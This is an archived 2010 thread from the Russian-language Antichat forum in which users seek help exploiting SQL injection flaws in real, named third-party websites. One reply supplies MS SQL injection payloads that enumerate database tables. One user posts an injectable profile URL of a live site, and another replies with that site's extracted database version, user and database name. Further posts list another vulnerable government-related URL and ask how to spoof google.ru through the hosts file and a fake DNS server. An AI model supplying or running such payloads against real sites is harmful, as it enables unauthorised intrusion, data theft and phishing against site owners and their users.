ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.07.2010, 00:36
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Привет
Есть SQL инъекция
Код:
Code:
site.ru/index.php&name=1'
Поле name уязвимо
Если запрос прошел успешно то в браузере высвечивается 1 если еррор то 0
Известно что база MS SQL
Можно ли провести Blind SQL-inj? если да то подскажите статью как сделать это на MS SQL
Можно ли отправить запрос типа INSERT или UPDATE или еще что-то подобное чтоб проникнуть на сервер или изменить/создать данные в базе |
|
|
13.07.2010, 03:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2Byrger
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
и т.д.
(c) scipio
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
/showthread.php?t=30501
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
13.07.2010, 09:43
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
http://hotflation.com/myprofile.php?uid=185+and+1=1
а вот тут что можно придумать?
|
|
|
|
13.07.2010, 10:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от durito
durito said:
http://hotflation.com/myprofile.php?uid=185+and+1=1
а вот тут что можно придумать?
я одного не понимаю, что ты ждешь? что бы за тебя раскрутили скулю?задолбали таки вопросы ..тут стандартная скуль, сам и раскручивай... тщательно не рекомендую никому помогать данному индивидууму, за него скуль раскручивай , а он перед своими одноклассниками будет крутым хацкером...думаю предложить за такое сразу в бан посылать.сколько таких умников которые подставляют ковычку..и постят здесь результат..и жалобно поют помочь им, а мануалы кто читать будет?
Version:5.1.47
User:hflation_hf@localhost
Database:hflation_hf
поставь перед собой вопрос как узнать инфу которую я узнал...а не ныть здесь что бы за тебя все сделали...
|
|
|
|
13.07.2010, 12:55
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от shell_c0de
shell_c0de said:
2Byrger
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
и т.д.
(c) scipio
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
/showthread.php?t=30501
Я же говорю что сайт явных ощибок не выдает так что обычная инъекция в MS SQL Не катит там где в ошибке выводится имя таблиц и так далее
Сайт сообщает только о вверном или не верном запросе
|
|
|
|
13.07.2010, 14:15
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Подскажите, как правильно настроить фейковую страничку www.google.ru
Экспериментирую на своем компе, прописываю в файле C:\windows\system32\drivers\etc\hosts
www.google.ru 1111.2222.3333.4444
http://google.ru/ 1111.2222.3333.4444
Все ровно попадаю на настоящую страничку www.google.ru
И. если можно дайте ссылку, как настроить фейковый DNS сервер.
|
|
|
|
13.07.2010, 15:29
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
Сообщение от Gorev
Gorev said:
я одного не понимаю, что ты ждешь? что бы за тебя раскрутили скулю?задолбали таки вопросы ..тут стандартная скуль, сам и раскручивай... тщательно не рекомендую никому помогать данному индивидууму, за него скуль раскручивай , а он перед своими одноклассниками будет крутым хацкером...думаю предложить за такое сразу в бан посылать.сколько таких умников которые подставляют ковычку..и постят здесь результат..и жалобно поют помочь им, а мануалы кто читать будет?
Version:5.1.47
User:hflation_hf@localhost
Database:hflation_hf
поставь перед собой вопрос как узнать инфу которую я узнал...а не ныть здесь что бы за тебя все сделали...
ну зачем же сразу наезжать
я вот честно говоря не пойму, как ее раскручивать,
order by & group by не работают вроде. поэтому и спрашиваю, как крутить. вот и ставлю вопрос, как ты раскрутил?
ну нуб я и что в этом плохого. кто нубом не был?
|
|
|
|
13.07.2010, 15:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
54576
Репутация:
8
|
|
Сообщение от FlaktW
FlaktW said:
Подскажите, как правильно настроить фейковую страничку www.google.ru
Экспериментирую на своем компе, прописываю в файле C:\windows\system32\drivers\etc\hosts
www.google.ru 1111.2222.3333.4444
http://google.ru/ 1111.2222.3333.4444
Все ровно попадаю на настоящую страничку www.google.ru
И. если можно дайте ссылку, как настроить фейковый DNS сервер.
Ты даже не знаешь как выглядет формат IPv4, иди вот тут прочитай http://en.wikipedia.org/wiki/IPv4 что это такое, а я тебе потом помогу настроить твой hosts.
|
|
|
|
13.07.2010, 17:13
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от durito
durito said:
ну зачем же сразу наезжать
я вот честно говоря не пойму, как ее раскручивать,
order by & group by не работают вроде. поэтому и спрашиваю, как крутить. вот и ставлю вопрос, как ты раскрутил?
ну нуб я и что в этом плохого. кто нубом не был?
у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..
|
|
|
|
13.07.2010, 17:24
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
помогите кто с cfm
Код:
Code:
http://www.vaemergency.com/train/calendar_course.cfm?id=156
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
